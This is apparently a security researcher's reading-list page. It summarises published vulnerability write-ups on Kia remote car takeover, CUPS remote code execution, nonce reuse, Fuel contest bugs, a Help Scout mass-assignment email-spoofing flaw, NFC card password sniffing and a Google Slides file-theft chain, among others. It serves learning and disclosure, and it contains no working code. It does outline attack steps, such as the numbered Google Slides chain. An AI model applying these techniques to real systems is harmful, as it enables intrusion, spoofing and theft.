Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Hacking Kia: Remotely Controlling Cars With Just a License Plate- 1505

Sam Curry    Reference →Posted 1 Year Ago
  • Two years ago, Sam Curry and friends released one of the most banger blog posts ever - hacking every car company. After some time, they decided to come back to see if things had changed. This time, they took a look at Kia. Originally, they had focused on owners.kia.com and the Kia iOS app because they can remotely execute commands. The owners website used a backend reverse proxy to forward user commands to api.owners.kia.com whereas the mobile app talked to this directly.
  • This time around, they decided to tackle the problem from the dealers side. From talking with friends, they learned that Kia would ask for an email at the dealership and you'd receive a registration link for a new Kia account or add the car to your pre-existing account. They got the actual link from a friend and started playing around with it.
  • The linking request contained a vin and a token known as the Vin Key. This key is an access token generated by the Kia dealer for a one-time grant to modify the vehicle information. Under the hood, this was using the same API at owners.kia.com but once again through a reverse proxy. They were curious if more functionality existed on this API than they knew about. After digging through the JavaScript they found a function used for looking up accounts and vehicles that appeared to be employee-only functionality.
  • Trying to interact with this endpoint returned an error relating to not having a proper access token. So, what if we can register on the dealer website? They copied the format from other endpoints relating to users and it just worked on the dealer website! They logged into the dealer website to generate a dealer token and it actually worked.
  • With this, they went through the JavaScript to understand the functionality that had been unlocked. They could search for car information based upon a VIN number. What they wanted though was to remotely takeover the car! From sifting through JavaScript they found a chain of 7ish API calls that allowed them to execute commands on the car. This was a user lookup, and attacker account linking to their account and finally executing the commands. This affects every Kia made after 2013. Neat!
  • They rented a car to see this work, which is hilarious. Like this one, many of the coolest vulnerabilities come from deep recon and understanding your target well. The idea of changing endpoints for the registration request seems simple but getting there was complicated. Mitigating this doesn't seem very trivial but the timeline of 2 months seems too long. Good write up!

Attacking UNIX Systems via CUPS, Part I - 1504

EvilSocket    Reference →Posted 1 Year Ago
  • The Common Unix Printing System (CUPS) is installed on most Linux distros by default. When setting up a new laptop, the author of this post found that port 631 was open on 0.0.0.0 that was associated with this. The cups-browsed subsystem is a system responsible for discovering new printers and adding them to the system. The article is about the journey into madness reading through this.
  • The service can be connected to by anyone with no restrictions. There is a configuration file that allows this to be restricted but it's not down by default on any systems that they reviewed. Running this through AFL gave them 5 unique crashes. Two of them appeared to be pointers being derefenerenecd before the exit condition was verified. The second one was a denial of service from a lock being held onto for too long.
  • They didn't even try to exploit these, as they thought lower hanging fruit might be available. They hacked together some Python code to communicate with the service and got back a connection over the Internet Printing Protocol (IPP) to their computer from the box on the Internet. Now, the Linux box thinks that our friend EvilSocket is a printer with many requests being sent via HTTP for information such as the model, vendor and other things.
  • They found a Python library called ippserver to interact with the computer properly. Using this, they were able to add a fake printer to the computer without any user interaction. Now, we have a good way to interact with the Linux computer as a fake printer to further go deep.
  • While reading the logs of the service, they saw references to a PPD or PostScript Printer Description file. This text file is provided by vendors to describe printer capabilities to CUPS and instructs an interface via various commands on how to use it properly via a DSL. Notability, the fake printer is writing this to the users system to describe how to interact with their printer.
  • After reading the documentation for some time, they came across the cupsFilter2 directive. This will execute binaries located within a particular location on the system and the checks for which binaries are executed is pretty solid. Luckily, there are some of programs to work with, including foomatic-rip. This program accepts an arbitrary command to be executed from bash!
  • This sounds crazy (and it is) but it's apparently a necessary evil. This issue has been known for a while but it's difficult to fix because of the way existing drivers from older printers use it. They found one doozy that was running a Perl command in it even. This issue was once patched in FoomaticRipCommandLine but was not added when this functionality was ported to CUPS. Sometimes, security can be in direct conflict with backwards compatibility and usability.
  • This isn't a zero click RCE luckily but is still scary. First, an attacker would add their printer to the machine. Next, they return the malicious directive that gives us arbitrary command execution. Finally, the user must send a print job to the fake printer, which will pop a shell when executed. To get this to run, they needed to find a parsing bypass (which was easy with added a few spaces) to get this to be executed in the cupsFilter. An amazing bug that only took them a weekend to find.
  • The remediation process seemed quite terrible for them and time consuming. Most of the considerations were is this a real issue that needs to be addressed at all?. When you have arguments like "I am just pointing out that the public Internet attack is limited to servers that are directly connected to the Internet" to try to limit the expected impact, it's hard, especially with 200-300K devices that were likely effected on Shodan alone.
  • I feel bad for how this was handled, as it was pretty terrible. The people working on CUPS want to add features to make users lives better and security is just a thorn in the side of that goal. They're also volunteers in all likelihood. As a developer, we need to be open to fixing our mistakes and evaluating the impact for what it truly is. Great write up on both the technical and non-technical side!

Friends don’t let friends reuse nonces- 1503

Joe Doyle - Trail of Bits    Reference →Posted 1 Year Ago
  • In Cryptography a nonce (number used only once) is an important part of any encryption or signature algorithm. It's a big deal to not reuse nonces in cryptography but they are allowed to be public most of the time. When done incorrectly, it can be used to reveal secrets in encrypted messages or even recover the crypto key in the case of DSA. The article talks about why the reuse of nonces is so bad.
  • Encrypted channels work by changing the content of a message to be effectively random noise and then decoded on the other end. Going back to old ciphers from the 1500s, the mechanism was to sub in a given symbol with another mapped symbol. This could be done in the opposite direction to decrypt it. The security of this relies on the third parties (Evil Eve) not being able to infer information about the symbol-substitution procedure when looking at the encrypted data.
  • Many ciphers were broken by observing patterns within the individual encrypted messages, such as the Banburismus technique used to break the Enigma machine. To prevent his from happening, instead of having a single symbol to map to modern ciphers have 128 or 256-bit block sizeS. Additionally, there are rules in place to ensure to create a good substitution table for every symbol or block in this case.
  • The first part shows the classic Linux tux penguin being encrypted using ECB mode. Even though it's encrypted, you can still see Tux in the image! This is because blocks with the same data will produce the same output. To prevent this from happening, we introduce a nonce.
  • AES-CTR and ChaCha20 are both encryption modes that use an incrementing value as the nonce. When using the same noise (nonce) with two images, XORing the values together will produce the plaintext. If you ever reuse a nonce, an attacker who sees two encrypted messages can learn the XOR of the plaintext. If nonces aren't reused between different messages, then it's impossible to recover the original data. AES Ctr mode is weird - it encrypts the nonce then XORs that with the plaintext. This is why this is possible.
  • Recently, when auditing a protocol, they found an issue relating to this where Alice, Bob and Carol were the actors in a peer-to-peer communication model. After doing a secret sharing algorithm via asymmetric cryptography, they generate a key for ChaCha20 to use. When the algorithm is initialized, they all start with a nonce of zero.
  • As a result, if an attacker can sniff the message going from Alice to Bob then another from Bob to Alice with the same key and nonce, they can XOR the encrypted data together to recover the original! The important fields that are XORed are pseudorandom so it's not possible to learn all of their contents. The nonce reuse did allow them to leak the MAC key and an MitM could have been done to modify messages in transit.
  • The major difference can be seen on Tux and Betsy on why they couldn't get the message. Notice that the image was not perfectly recovered. These images were perfect because of the large amount of white and black on them, making them easy for overlaps. In the real world, if the numbers are random, you won't be able to see anything because the XORs will appear random.
  • Overall, I enjoyed the post and the visuals from it!

Top 5 Bugs from the Fuel Attackathon- 1502

Immunefi    Reference →Posted 1 Year Ago
  • Fuel Network is an Ethereum L2 with a custom language, bridge and VM. The contest had a reward pool of $1M. Some big-time vulnerabilities were found in it, which are explained in the article.
  • In Fuel, messages can be sent from the L2 to the L1. The function update_execution_data adds all message ids to the MessageOut receipts of the current tx execution data even if the tx itself has reverted. Because the tx failed, it un-burns the tokens on the Fuel side. Even though the receipt has already been used with a revert, it can be used again on a successful call. This means it's possible to relay the same receipt multiple times (as long as it corresponds with another user transfer) to steal the user's funds.
  • The next two issues are compiler-related. Supertraits allow defining a function that is inherited by the contract implementing a given trait. Because these are sensitive functions, they should be locked down by the user-programmed behavior. In reality, all of the supertraits are available externally. The example they show is renounce_ownership being called by an arbitrary user, even though it shouldn't be callable.
  • The second compiler bug is an optimization issue. The compiler needs to decide which instructions are considered dead or in use. Alongside this, the DCE optimization pass will eliminate dead code that has no bearing on the output of the program. The Sway optimization step labeled instructions which actually had results in it as having dead code. This leads to incorrect values in a register and unexpected behavior by the program.
  • One of the standard libraries was missing overflow protections for smaller data types of the pow function such as u8, u16 and u32. If developers were expecting these overflows to be caught (which is a fair assumption), then incorrect math would occur, leading to potential security risks.
  • The Code Copy (CCP) instruction copies code from a specified contract into memory. When it does this, it charges gas based on the contract's total size rather than the number of bytes copied. If an offset into the contracts bytecode is given that exceeds the length then unwrap_or_default will return an empty slice. Later on, the write occurs to the contract but it contains a way to backfill it if the lengths don't line up with zeros. Neat!
  • Since the cost is associated with the size of the contract and nothing is copied, this ends up being super cheap! In blockchain-land, having expensive operations (like clearing memory) can lead to a denial of service (DoS) by resource exhaustion.
  • I took some time to look at the code when this contest happened but didn't find anything. It was interesting to see bugs in the compiler and bridge handling when I spent my time looking at the VM for memory safety issues. I enjoyed the write-up and learned a bunch more about proper target selection!

Banana Gun Hacked- 1501

Rekt    Reference →Posted 1 Year Ago
  • BananaGun is a telegram trading bot for Ethereum and Solana. From reading the documentation, the bot can be configured by the user to perform various actions automatically or directly from the app. This means, that in some capacity, the bot must have access to users private keys.
  • The analysis makes it pretty clear where the vulnerability was at. Only users with a public presence were affected by this issue. Hence, the bot itself had been manipulated somehow. According to the write-up, the oracle for the Telegram bot had been tricked. There are no details on what went wrong in the oracle but it was probably something like missing contract address checks.
  • At the end of the day, $3M was stolen from 11 users of the platform using this vulnerability. Afterwards, BananaGun added 2FA, transfer delays and security reviews, all things that should have been done before the hack. I find web3 off-chain infrastructure interesting, so this bug tickled my fancy on that end. I wish w had more details on the actual oracle vuln though.

Help Scout - Mass assignment vulnerability on inbox settings - 1500

Synacktiv    Reference →Posted 1 Year Ago
  • Help Scout is a shared inbox, help center and live chat software to manage customer communications. Among other things, emails can be sent to customers from external email addresses proxied through Help Scout.
  • To add an email to a shared inbox, a verification code is sent to the email to ensure that you have control over it. Once this has been verified, emails can be sent through the email address.
  • This is a two step process: the setting and verification. When retrieving the information on response, the authors noticed the field emailIsConfirmed. By setting this value in the JSON of the setting request, the email will be verified. This is commonly referred to as a mass assignment vulnerability but isn't super common.
  • Since the email is going through Help Scout and it has verified the proxied email, the SPF and DKIM verification will pass. This allows for the spoofing of an arbitrary sender with domain verification on Help Scout. Wordpress, pypi, mailchip and digital ocean are big targets that use the platform. Overall, a good post that is straight to the point.

Cracking the Digital Business Card - 1499

IMcPwn    Reference →Posted 1 Year Ago
  • Popl is a digital business card. The business cards contain NFC that allow someone to open a website so that you can connect with them later. The Popl app, used for setting up the electronic part of the business cards, has a $77 annual subscription fee.
  • To me, this is a classic "I own these and therefore I should be able to do what I want with them". The goal was to edit the NFC data on the card to whatever information that we wanted, since we do own it.
  • The author first tried playing around with the classic NFC Tools app to change the record information. The NFC card had a password write-protect feature (which can only be 4 bytes long). They tried the default passwords of 00000000 and FFFFFFFF but neither of these worked. Next, they tried the Unlock NTAG NFC action on the Flipper Zero to no avail. At this point, we know that the system is not using any default or easy-to-guess passwords.
  • They tried using an iCopy tool, which just wraps the Proxmark tool. Using this, they dumped all available page information from it. Apparently, the Proxmark can sometimes pull out the password from the card but it was unable to do it in this place. From crunching numbers, they claim it would take 27 years to brute force the stored code, making this unviable as well.
  • The iOS application for the business cards must communicate with the NFC chip to write the URL to it. If that's true, then the phone app must have access to the password! Since the password is required for writing and the app indeed does writes, we should be able to figure this out. Using the Proxmarks trace list command, we can see all commands for the card. In the output is an authentication command with the password in plaintext! There's the password, which is just the string test :)
  • With a known password, the author wanted to edit the card. Using the NFC Tools app, they were able to successfully authenticate using the Advanced Commands to send a raw packet. For whatever reason, the authentication would succeed but would fail whenever they tried to do any writes. Although this could probably be solved by writing a custom app to do this, they wanted something easier.
  • With NFC cards, it's possible to just remove the password! They tried to use the ProxMark for this and it worked! The password was removed. It should be noted (not in article) that NFC Tools will use the first 4 bytes of an MD5 hash of the password provided and not the actual bytes of it but there are other apps that will use the raw bytes, like NFC Read Write.
  • Finally, they were able to write their NFC card! This was a good write up that was fun to see real-world application of NFC. In my mind, there is no good way to secure this from unauthorized writes because the password can always be sniffed or reverse-engineered from the app. There are more secure authentication protocols in newer NFC cards (I think?) that could potentially be proxied to a server to prevent writes in the future. But, regardless, I'm happy this got cracked!

Using YouTube to steal your files- 1498

lyra    Reference →Posted 1 Year Ago
  • The author found several weird quirks and behaviors that were not useful individually. By combining all of these together, they were able to steal files on Google Slides with YouTube.
  • Google Slides allows for the embedding of YouTube videos. When doing this, it makes a request to just add the video id to the page. Using a directory traversal, it's possible to go backwards on YouTube. Since YouTube has anti-framing protections on the main page couldn't be used but emojis, css/js and some other things could be framed. Our own website here would be nice to have!
  • The author started looking for an open redirect on YouTube now. They first tried looking at how external links were processed but realized that it required an extra click. Next, they reviewed the authentication flow. Within the authentication flow, they found a redirect but only to a few YouTube subdomains. Luckily, they found an open redirect on accounts.youtube.com but ONLY for various Google products.
  • The redirect chain is now YouTube->accounts.youtube.com->docs.google.com. Why is this helpful though? According to the author, Google Docs has SAMEORIGIN on the iFrame options, meaning we shouldn't be able to add iFrames on the page besides for itself. If a document has been framed, it automatically disables dangerous functionality like sharing though, making this hard to exploit.
  • While looking through links, they came across docs.google.com/file/d/{ID}/edit. This page gives a preview of the file and allows for sharing the document as well. It also stays on the docs.google.com domain as well, instead of redirecting to the Drive.
  • They remembered that Google had a feature that requested access to a folder. This will send an email with a link that prepopulates the request for information. While messing around with the fields, they noticed that they could turn this from two clicks to one click by adding in the userstoinvite parameter to the URL. Additionally, removing the capabilities option from the URL just defaulted to edit.
  • Putting everything together doesn't frame the permissions page though. Why? Various people at Google mentioned that there is a mitigation in place for preventing cross-origin framing on the server-side. The server-side is checking the Sec-Fetch-Dest and Sec-Fetch-Site headers. To bypass this, the request BEFORE the file preview must be a same origin redirect, instead of coming from YouTube.
  • Instead of finding another open redirect, they realized that ANY change in the URL with a redirect was fine. For instance, https://docs.google.com/a/a/file/d/<file>edit would go to the main file after the redirect. To make this more believable, they put a Google Form over the top of the docs link with a hole over a particular portion of it. All it takes is one click!
  • Here's the full attack:
    1. Create a Google Slide with the crazy URL as an embedded URL.
    2. User loads the Google Slideshow which will load the page we need with the steps below.
    3. Path traversal is performed on YouTube.com to move to accounts.youtube.com.
    4. Use the redirect from accounts.youtube.com to the /a/a google doc link.
    5. Redirect is done to go to the document sharing link.
    6. User clicks on the iFramed box, giving the attacker access to it.
  • The amount of steps and problem-solving here was amazing! I found this via James Kettle and this post did not disappoint at all. The more I read about client-side security, the more I realize I know nothing about the browser. Great post!

Ghost in the Block: Ethereum Consensus Vulnerability- 1497

Giuseppe Cocomazzi - Asymmetric Research    Reference →Posted 1 Year Ago
  • Simple Serialize (SSZ) is used by Ethereum clients in the consensus protocol and in P to P communication. The SSZ soundness depends on the involutive and injective property. The involutive property is that serializing a value then deserializing it will resolve to the original value. The injective property is that if A=B then serialized A should also equal serialized B. Some of these properties didn't hold, which resulted in a vulnerability.
  • SSZ relies on offsets and lengths for encoded objects. For the serialized block information we want to send (SignedBeaconBlockDeneb) the object, there are multiple layers of nesting in order to properly transfer all information. Within a block, is a body. To go from the block of offset 0x64 and then the offset of the body in the block type of 0x54 puts us at 0xB8.
  • The body contains its own set of values that have their own offsets in the block information. With this whole system of offsets to find objects, the serialization system works well. It should be a requirement that there are no gaps in the data. However, by changing the offsets around for objects (which have set lengths), ghost regions can be inserted into the data.
  • By itself, this isn't a huge deal. However, not all clients function this way. Many of them will reject the block information outright even. Since Prysm acts one way (shown above) and Lighthouse acts another that rejects it, this will lead to a consensus failure in the protocol. Doing this does not modify the hash tree root at all either. When setting this up locally, it resulted in the network just stopping entirely.
  • An interesting takeaway from the author: "Paradoxically enough, the same design choice of favoring multiple implementations has brought a new vulnerability class, that of “consensus bugs”, on which we hopefully shed some new light." Overall, a great article on a subtle difference in the Ethereum serialization code.

The unreasonable success of Fuzzing- 1496

Halvar Flake    Reference →Posted 1 Year Ago
  • Fuzzing is a technique that many of us know and love. But why is it so effective? This talk aims to go through the origins of fuzzing and why it works as well as it does.
  • The origins stem back to software being bad in the 90s and early 2000s. For a while people felt that "you fuzz if you're too stupid to audit code". Over time, this perception changed. At this point, you could send random data to most programs and get a crash from it. This included a remote OpenSSH bug, RealServer (music streaming) RCE, Cisco IKE and an Acrobat font bug.
  • After the introduction of fuzzing and its effectiveness, the author gives us reasons why its so good. First, it's crazily efficient. It parallels well, it's only limited by computing power and gives us very false positives. They do mention that it's worth "being clever" to make it faster, which can make a big difference in some situations.
  • Next, it scales with the complexity of the project. It finds weird states that a human doesn't have time to think about. This seems to be a theme though - the next one is that fuzzers are generally simple designs compared to fully understanding a project. Sending random data and setting this up is much simpler than static analyzers, solvers and pure code review.
  • The final section discusses the similarities between AI and fuzzing. They base this around the bitter lesson that computation search is much better than human intuition. The article linked above discusses Chess and Go AI history and ends with AI and computer vision. I personally fall into the trap that my personal knowledge is going to be better than a computer doing something but that's almost always wrong. Combining the humans ability to optimize and make the computers faster is what we should focus on.
  • In the case of fuzzing, they see it as the same. Fuzzing requires lots of computing power with the smarts of the person who set up the power helping with the efficiency of it. The success of fuzzing depends on large tree searches.
  • They go through the issues with code coverage as the main metric for fuzzers being limited by an implicit state machine. How can this be improved? Should the state machine be modeled?
  • The end asks a question whether the future will be more clever fuzzing or more systems engineering to make the fuzzer run more times. I think it's a combination of both but interesting parallels that to an industry that I had not considered very much in security.